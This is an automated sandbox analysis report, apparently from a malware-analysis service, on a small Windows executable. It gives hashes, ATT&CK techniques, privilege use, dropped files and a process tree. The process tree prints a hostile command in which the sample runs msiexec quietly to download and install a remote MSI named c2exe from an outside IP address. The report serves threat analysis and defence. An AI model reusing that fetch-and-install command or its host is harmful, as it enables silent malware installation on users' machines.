f29f43f6f55ce03ac416dbdeea5e0accc95a113ae6ea920ced8ce315f025f1f1

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
29-05-2024 06:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f29f43f6f55ce03ac416dbdeea5e0accc95a113ae6ea920ced8ce315f025f1f1.exe
Size

25KB
MD5

0777a8425eb53fb53a9c9aae696ec559
SHA1

41f8067c2b2576a9d9e3e5da2c203e9061962f60
SHA256

f29f43f6f55ce03ac416dbdeea5e0accc95a113ae6ea920ced8ce315f025f1f1
SHA512

7353a8bb31d192750aeb07190b73a80d33bc6a861acb3b85b974fde81c01f35f2db8226a743e5c4212d1b82fd6820470c10b9695408619656ef4b048ce07fdd0
SSDEEP

768:HEHP8Lxk5NkkkkEvkkIhswkkkkkkkkkkkkkwjHHM41v1YbVkEgm3HrdV:HEHP8L2kkkkOkkIhswkkkkkkkkkkkkkb

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
4080	c2exe.exe

Loads dropped DLL 1 IoCs

pid	Process
664	MsiExec.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4120	ICACLS.EXE

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
2252	msiexec.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
7	4672	msiexec.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe

Drops file in Windows directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI4D16.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5073.tmp	msiexec.exe
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	EXPAND.EXE
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	EXPAND.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3376	f29f43f6f55ce03ac416dbdeea5e0accc95a113ae6ea920ced8ce315f025f1f1.exe
3376	f29f43f6f55ce03ac416dbdeea5e0accc95a113ae6ea920ced8ce315f025f1f1.exe
4672	msiexec.exe
4672	msiexec.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: SeDebugPrivilege	3376	f29f43f6f55ce03ac416dbdeea5e0accc95a113ae6ea920ced8ce315f025f1f1.exe
Token: SeShutdownPrivilege	2252	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2252	msiexec.exe
Token: SeSecurityPrivilege	4672	msiexec.exe
Token: SeCreateTokenPrivilege	2252	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2252	msiexec.exe
Token: SeLockMemoryPrivilege	2252	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2252	msiexec.exe
Token: SeMachineAccountPrivilege	2252	msiexec.exe
Token: SeTcbPrivilege	2252	msiexec.exe
Token: SeSecurityPrivilege	2252	msiexec.exe
Token: SeTakeOwnershipPrivilege	2252	msiexec.exe
Token: SeLoadDriverPrivilege	2252	msiexec.exe
Token: SeSystemProfilePrivilege	2252	msiexec.exe
Token: SeSystemtimePrivilege	2252	msiexec.exe
Token: SeProfSingleProcessPrivilege	2252	msiexec.exe
Token: SeIncBasePriorityPrivilege	2252	msiexec.exe
Token: SeCreatePagefilePrivilege	2252	msiexec.exe
Token: SeCreatePermanentPrivilege	2252	msiexec.exe
Token: SeBackupPrivilege	2252	msiexec.exe
Token: SeRestorePrivilege	2252	msiexec.exe
Token: SeShutdownPrivilege	2252	msiexec.exe
Token: SeDebugPrivilege	2252	msiexec.exe
Token: SeAuditPrivilege	2252	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2252	msiexec.exe
Token: SeChangeNotifyPrivilege	2252	msiexec.exe
Token: SeRemoteShutdownPrivilege	2252	msiexec.exe
Token: SeUndockPrivilege	2252	msiexec.exe
Token: SeSyncAgentPrivilege	2252	msiexec.exe
Token: SeEnableDelegationPrivilege	2252	msiexec.exe
Token: SeManageVolumePrivilege	2252	msiexec.exe
Token: SeImpersonatePrivilege	2252	msiexec.exe
Token: SeCreateGlobalPrivilege	2252	msiexec.exe
Token: SeRestorePrivilege	4672	msiexec.exe
Token: SeTakeOwnershipPrivilege	4672	msiexec.exe
Token: SeRestorePrivilege	4672	msiexec.exe
Token: SeTakeOwnershipPrivilege	4672	msiexec.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 3376 wrote to memory of 2252	3376	f29f43f6f55ce03ac416dbdeea5e0accc95a113ae6ea920ced8ce315f025f1f1.exe	83
PID 3376 wrote to memory of 2252	3376	f29f43f6f55ce03ac416dbdeea5e0accc95a113ae6ea920ced8ce315f025f1f1.exe	83
PID 4672 wrote to memory of 664	4672	msiexec.exe	86
PID 4672 wrote to memory of 664	4672	msiexec.exe	86
PID 4672 wrote to memory of 664	4672	msiexec.exe	86
PID 664 wrote to memory of 4120	664	MsiExec.exe	87
PID 664 wrote to memory of 4120	664	MsiExec.exe	87
PID 664 wrote to memory of 4120	664	MsiExec.exe	87
PID 664 wrote to memory of 4116	664	MsiExec.exe	89
PID 664 wrote to memory of 4116	664	MsiExec.exe	89
PID 664 wrote to memory of 4116	664	MsiExec.exe	89
PID 664 wrote to memory of 4080	664	MsiExec.exe	91
PID 664 wrote to memory of 4080	664	MsiExec.exe	91

C:\Users\Admin\AppData\Local\Temp\f29f43f6f55ce03ac416dbdeea5e0accc95a113ae6ea920ced8ce315f025f1f1.exe
"C:\Users\Admin\AppData\Local\Temp\f29f43f6f55ce03ac416dbdeea5e0accc95a113ae6ea920ced8ce315f025f1f1.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3376
- C:\Windows\system32\msiexec.exe
  "C:\Windows\system32\msiexec.exe" /quiet /i http://3.141.55.131:8000/c2exe.msi
  2⤵
  - Use of msiexec (install) with remote resource
  - Suspicious use of AdjustPrivilegeToken
  PID:2252

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4672
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 7B31C5735CBF13E81E36BFE5A9CB25E8
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:664
- - C:\Windows\SysWOW64\ICACLS.EXE
    "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-1c2acd6f-3d2e-4f4f-b32a-624122d32237\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
    3⤵
    - Modifies file permissions
    PID:4120
- - C:\Windows\SysWOW64\EXPAND.EXE
    "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
    3⤵
    - Drops file in Windows directory
    PID:4116
- - C:\Users\Admin\AppData\Local\Temp\MW-1c2acd6f-3d2e-4f4f-b32a-624122d32237\files\c2exe.exe
    "C:\Users\Admin\AppData\Local\Temp\MW-1c2acd6f-3d2e-4f4f-b32a-624122d32237\files\c2exe.exe"
    3⤵
    - Executes dropped EXE
    PID:4080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\MW-1c2acd6f-3d2e-4f4f-b32a-624122d32237\files.cab

Filesize
6KB

MD5
f48a85de44fbab2c246fae7ac3c2e079

SHA1
6ae186f30e2d1ffbda51daf5385dd5323daaf8b0

SHA256
433894591dde3ef00e6b59f13c5106574d2920c5bde0c82567331305b2607127

SHA512
4adf930db3f3eeb81132a0223c80bd7c066c279258aeeed88e300d38b3e8cdf1db9d643c9a60ae164a4b6e1892e6a389b0efcd3cccbb2c93b9bf0d061207dee3

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-1c2acd6f-3d2e-4f4f-b32a-624122d32237\files\c2exe.exe

Filesize
6KB

MD5
2f4531484ff7ac43f50304a421d52d8a

SHA1
237404f24027658f4b7c4b59f4b6342b7694d141

SHA256
1ef99f635530b86c85c4d3a3e2bd382e9ca61ac6b23ef1bfaf141933107aad89

SHA512
967b93e18ef39d2138d8123e110bbb61114fbf7238eff53d9888c527dbdddd1e643224942dfd29d9a8448ffb857f5c4a2319118d05dcdbb656d1556968c930d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-1c2acd6f-3d2e-4f4f-b32a-624122d32237\msiwrapper.ini

Filesize
1KB

MD5
1b8a452b5cc228691efa6dac653f056d

SHA1
5f21739e35a00c35d15b748b028629d06615c66e

SHA256
60e2861e5550c2393686fa1c54e1c0f7993fafe8f020d08fa39a34aabc270ccf

SHA512
5194794c98507ef49127cb1dfd16bf3b8c7781b91737177b740e1427681c8cd03bfaa7ad69a2b5c82c3a91789635fc1e3f9556c2f38fa6f02d9d2d0ce012a4df

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fbj53cxm.poa.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\Installer\MSI4D16.tmp

Filesize
252KB

MD5
d457ede045732a5c1e1895304d1dc560

SHA1
658c7ccbb5164044da088f5c3e447de059571e20

SHA256
2cf84ed623f2680e8162d7499b9bdab785dad88bfb6fc012717f53c8dfae3dde

SHA512
6da954934dcbabda052ffe6324880145e8e5334a077d1be0e865f6679e0abd6e207712d37f1f6ce6b79073d18dacaa60d56cc5bf534fe8f66138a29e8fba2f4c

Download Submit
C:\Windows\Installer\MSI5073.tmp

Filesize
208KB

MD5
0c8921bbcc37c6efd34faf44cf3b0cb5

SHA1
dcfa71246157edcd09eecaf9d4c5e360b24b3e49

SHA256
fd622cf73ea951a6de631063aba856487d77745dd1500adca61902b8dde56fe1

SHA512
ed55443e20d40cca90596f0a0542fa5ab83fe0270399adfaafd172987fb813dfd44ec0da0a58c096af3641003f830341fe259ad5bce9823f238ae63b7e11e108

Download Submit
memory/3376-0-0x00007FF8E95B3000-0x00007FF8E95B5000-memory.dmp

Filesize
8KB

Download
memory/3376-1-0x0000000000010000-0x000000000001C000-memory.dmp

Filesize
48KB

Download
memory/3376-11-0x000000001AB80000-0x000000001ABA2000-memory.dmp

Filesize
136KB

Download
memory/3376-12-0x00007FF8E95B0000-0x00007FF8EA071000-memory.dmp

Filesize
10.8MB

Download
memory/3376-14-0x00007FF8E95B0000-0x00007FF8EA071000-memory.dmp

Filesize
10.8MB

Download
memory/4080-84-0x00000000003B0000-0x00000000003B8000-memory.dmp

Filesize
32KB

Download